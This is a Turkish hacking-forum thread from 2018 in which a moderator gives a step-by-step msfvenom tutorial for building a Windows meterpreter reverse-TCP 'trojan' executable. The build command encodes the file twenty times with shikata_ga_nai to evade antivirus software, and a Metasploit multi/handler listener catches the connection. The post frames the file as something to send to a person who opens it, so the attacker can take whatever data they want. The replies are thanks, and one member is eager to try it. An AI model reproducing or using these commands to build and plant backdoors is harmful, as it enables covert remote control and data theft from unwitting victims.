İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

Msfvenom Aracı İle Port Açmadan Trojan Oluşturma / SeNZeRo

04-11-2018 01:53
#1
SeNZeRo - ait Kullanıcı Resmi (Avatar)
Süper Moderatör
Üyelik tarihi:
09/2016
Mesajlar:
4.995
Teşekkür (Etti):
59
Teşekkür (Aldı):
1138
Konular:
442
Merhaba arkadaşlar. Bugün bir çok kişinin baş belası olan port açma derdini ortadan kaldıracağız. Métasploitin alt dalı olarak sunduğu Msfvenom aracını kullanarak trojan (rat / backdoor) oluşturacağız. Bu işlemi yaparken de port açmayacağız.


Msfvenom Nedir Ve İşe Yarar ?


Msfvenom aracı métasploitin alt dalında yürütülen bir projedir. Daha önceden backdoor oluşturmak için msfpayload aracı kullanılıyordu. Métasploitin msfpayloada verdiği desteğini kesmesi üzerine yeni bir araç olarak msfvenomu çıkarttı. Msfvenom aracı Msfpayload ve Msfencode araçlarının birleşmiş halidir. Bu sayede tek araçla bir çok işi halledebiliyoruz.


Msfvenom aracı hakkında ayrıntılı bilgi için terminale aşağıdaki komutu yazınız.


Kod:
msfvenom -h

Kullanılan bazı parametreler;


-l = Payload, encoder,npos modül tüplerini listeler.
-p = Kullanacağımız payloadı seçmemize yarar.
-f = Çıktının yani oluşturacağımız trojanın hangi türde olacağını seçmemize yarar. Örneğin .exe, dll, asp, vba vs gibi.
-e = Oluşturacağımız trojana bir encoder ekleyerek antivirüslere yakalanmamasını sağlar.
-a = Payloadın çalışacağı mimariyi seçmemize yarar. Desteklenen bazı mimariler x86 and x64, ARM, PPC Sparc dir.
-o = Oluşturduğumuz trojanın nereye çıkacağını belirtmeye yarar.
-b = Kötü karakterleri (bad characters) temizler.
-n = Oluşturulan trojanın başına nopsled ekler.
-s = Oluşturulan trojanın memory alanı boyutunu byte olarak belirleyebiliriz.
-i = Encoding işleminin kaç kez tekrarlanacağını belirtir.
-c = Birleştirilecek shell code' yi belirtmeye yarar.
-k = Birleştirilen dosyanın fonksiyonlarının bozulmasını engeller.


Yukarıda trojanı oluştururken kullandığımız parametreleri listeledim. Şimdi de trojanımızı oluşturmaya geçelim.


Genel olarak trojan oluşturma kodu:

Kod:
msfvenom –p <payload adı> --payload-options (seçtiğimiz payloadın ayarlarını yapmamızı sağlar)

Öncelikle payload türümüzü seçmeliyiz. Hangi sistem için yapacak isek onun payloadını seçmeliyiz. Örnek olarak birkaç payload türü:


Windows


Kod:
-p windows/meterpreter/reverse_tcp
Linux

Kod:
-p linux/x86/meterpreter/reverse_tcp
PHP

Kod:
-p php/meterpreter_reverse_tcp
Python

Kod:
-p cmd/unix/reverse_python
Bash

Kod:
-p cmd/unix/reverse_bash

Andorid


Kod:
–p android/meterpreter/reverse_tcp

Ben örnek olarak windows için .exe bir trojan oluşturacağım. Payloadımızı seçtik -p windows/meterpreter/reverse_tcp Payloadı seçtikten sonra LHOST ve LPORT değerlerini yani trojanı attığımız kişi trojanı açarsa bağlantının hangi ip ye gelmesini istediğimizi yazacağız. Bunun için terminale ifconfig yazarak kendi ip adresimizi alıyoruz.


Bu işlemleri yaptıktan sonra komutumuz şu hale geldi:

Kod:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ipadresimiz LPORT=4444

Bundan sonra konunun başında belirtmiş olduğum komutları kullanarak trojanın ayarlarını istediğiniz şekilde yapabilirsiniz. Ben örnek olarak aşağıdaki şekilde yapacağım.


Kod:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.135.151 LPORT=443 -f exe -a x86 -o /root/Masaüstü/trojan.exe --platform windows -e x86/shikata_ga_nai -i 20

Trojanımızı başarılı bir şekilde oluşturduk. Şimdi de oluşturduğumuz trojanı dinlemeye alalım. Yani trojanı birisi açtığında bağlantının gelmesini sağlayacağız.


Bunun için métasploiti msfconsole yazarak çalıştırıyoruz. Métasploit açıldıktan sonra aşağıdaki adımları izliyoruz.


Alıntı:
use exploit/multi/handler >>> Komutu ile dinleme modülüne giriyoruz.
set payload <seçtiğimiz payload> >>> İlk başta seçtiğimiz payloadı yazıyoruz. Ben windows/meterpreter/reverse_tcp seçmiştim.
set LHOST=<kendi ip adresimizi yazıyoruz> >>> Trojanı oluştururken ifconfig komutu ile aldığımız ip adresimizi yazıyoruz.
set LPORT=443 >>> Yazdığımız portu yazıyoruz.
exploit >>> Dinleme işlemini başlatır.

Böylelikle dinleme moduna almış olduk. Attığımız trojanı birisi açarsa buraya düşecek ve istediğiniz bilgileri alabileceksiniz. Konuya trojan açıldıktan, oturum geldikten sonra neler yapabileceğimizi ve istediğimiz verileri nasıl alabileceğimizi de ekleyeceğim. İyi formlar.
Kullanıcı İmzası
Nûn kadar suskun,
Vâv kadar edebli olabilmeli,
insan...
Konu SeNZeRo tarafından (04-11-2018 10:01 Saat 10:01 ) değiştirilmiştir.

04-11-2018 01:55
#2
Üyelik tarihi:
01/2017
Nereden:
UnderGround
Yaş:
8
Mesajlar:
2.254
Teşekkür (Etti):
207
Teşekkür (Aldı):
484
Konular:
135
elinize sağlık hocam
Kullanıcı İmzası
Belki Başka Bir Gün Görüşürüz..)

Bir zamanlar SolidStar..
Bir zamanlar R4V3N...

Eski Anka tim asistanı!
Copyright © 2017 - 2019
04-11-2018 02:04
#3
ch_arli41 - ait Kullanıcı Resmi (Avatar)
Eğitmen
Üyelik tarihi:
07/2009
Mesajlar:
930
Teşekkür (Etti):
557
Teşekkür (Aldı):
437
Konular:
57
Eline sağlık güzel konu
Kullanıcı İmzası
04-11-2018 02:13
#4
oldnco - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2017
Yaş:
29
Mesajlar:
1.525
Teşekkür (Etti):
635
Teşekkür (Aldı):
370
Konular:
43
elinize sağlık hocam
04-11-2018 03:04
#5
THE HACKER 21 - ait Kullanıcı Resmi (Avatar)
Junior Pentester
Üyelik tarihi:
03/2017
Mesajlar:
2.944
Teşekkür (Etti):
199
Teşekkür (Aldı):
908
Konular:
86
Elinize Sağlık Hocam
04-11-2018 04:36
#6
Whiteht - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2015
Nereden:
C:/
Mesajlar:
1.349
Teşekkür (Etti):
274
Teşekkür (Aldı):
248
Konular:
78
ellerinize sağlık hocam konu bittiğinde sabırsızlıkla denemeyi bekliyorum
Kullanıcı İmzası
Adalet ayrı şey Adillik ayrı doğrusu adilliktir adalet değil .
04-11-2018 11:46
#7
SeNZeRo - ait Kullanıcı Resmi (Avatar)
Süper Moderatör
Üyelik tarihi:
09/2016
Mesajlar:
4.995
Teşekkür (Etti):
59
Teşekkür (Aldı):
1138
Konular:
442
Alıntı:
HydraThalles´isimli üyeden Alıntı Mesajı göster
elinize sağlık hocam
Alıntı:
ch_arli41´isimli üyeden Alıntı Mesajı göster
Eline sağlık güzel konu
Alıntı:
oldnco´isimli üyeden Alıntı Mesajı göster
elinize sağlık hocam
Alıntı:
THE HACKER 21´isimli üyeden Alıntı Mesajı göster
Elinize Sağlık Hocam
Alıntı:
Whiteht´isimli üyeden Alıntı Mesajı göster
ellerinize sağlık hocam konu bittiğinde sabırsızlıkla denemeyi bekliyorum
Teşekkür ederim, sağolun.
Kullanıcı İmzası
Nûn kadar suskun,
Vâv kadar edebli olabilmeli,
insan...
04-11-2018 11:55
#8
Üyelik tarihi:
06/2015
Nereden:
ÖTÜKEN
Mesajlar:
2.536
Teşekkür (Etti):
285
Teşekkür (Aldı):
554
Konular:
265
Elinize sağlık hocam.
Kullanıcı İmzası
Hiçbir şeye ihtiyacımız yok, yaInız bir şeye ihtiyacımız vardır; çaIışkan oImak!
_____________________________________________

TÜRK
04-11-2018 12:00
#9
"Tranquila - ait Kullanıcı Resmi (Avatar)
Stajyer Sosyal Medya Yöneticisi
Üyelik tarihi:
08/2017
Nereden:
Trabzon
Yaş:
1
Mesajlar:
1.965
Konular:
220
ellerine sağlık ihtiyacım vardı
Kullanıcı İmzası
Eski bilgi teknolojileri ekibi albayı
Dışına baksam kat kat cila
İçeriyi kemiren tahtakuruları
04-11-2018 12:16
#10
Sontigin - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
09/2018
Nereden:
Ötüken
Mesajlar:
94
Teşekkür (Etti):
77
Teşekkür (Aldı):
8
Konular:
0
eline sağlık komutanım

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı